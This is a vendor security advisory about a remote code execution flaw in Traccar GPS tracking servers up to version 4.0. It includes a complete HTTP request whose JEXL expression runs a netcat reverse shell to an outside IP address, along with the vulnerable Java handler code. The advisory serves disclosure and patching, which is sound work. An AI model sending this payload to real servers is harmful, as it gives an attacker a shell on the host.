Menu
Our security team discovered a Remote Code Execution (RCE) vulnerability in the GPS vehicle tracking system Traccar (version <= 4.0). This allows an attacker to compromise the server’s host via a self-registered user account.
If you use Traccar server, please update to >= v4.1 as soon as possible.
Traccar is a widely deployed Open Source GPS tracking system which supports over one thousand different devices/protocols. The source tracking data is collected from devices by the server and is used to provide useful organisational services via a web portal, such as for logistics and efficient transportation worldwide.
A feature of the application allows a self-registered user to create expressions which effectively normalise the output of their tracking devices in order to improve integration with the application.
Examples are such as synthesising the engine state of vehicles where that data is lacking from the particular device by inferring it from the device’s battery charge state.
These expressions are interpreted by the third-party JexlEngine without adequate restriction from the Java Virtual Machine (JVM). As such, a crafted JEXL script can allow an attacker to compromise the server.
POST /traccar/api/attributes/computed/test?deviceId=1 HTTP/1.1
Host: foo.host.com
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Cookie: JSESSIONID=...; ext-devices-...
{"id":-1,"description":"test","type":"string","attribute":"raw",
"expression":"''.class.class.forName('java.lang.Runtime')
.getRuntime().exec('nc -nv 1.2.3.4 443 -e /bin/bash')"}
// src/org/traccar/processing/ComputedAttributesHandler.java
package org.traccar.processing;
...
import org.traccar.model.Position;
@ChannelHandler.Sharable
public class ComputedAttributesHandler extends BaseDataHandler {
public ComputedAttributesHandler() {
engine = new JexlEngine();
engine.setStrict(true);
...
}
private MapContext prepareContext(Position position) {
MapContext result = new MapContext();
...
return result;
}
public Object computeAttribute(Attribute attribute, Position position) throws JexlException {
return engine.createExpression(attribute.getExpression()).evaluate(prepareContext(position));
}
...
}
A proof-of-concept tool (traccar_exploit.v1.py) was was written to exploit this vulnerability and is demonstrated in this video
No software to download or install.
Contact us or call us 0113 887 8380
AppCheck is a software security vendor based in the UK, offering a leading security scanning platform that automates the discovery of security flaws within organisations websites, applications, network and cloud infrastructure. AppCheck are authorized by te Common Vulnerabilities and Exposures (CVE) Program aas a CVE Numbering Authority (CNA)
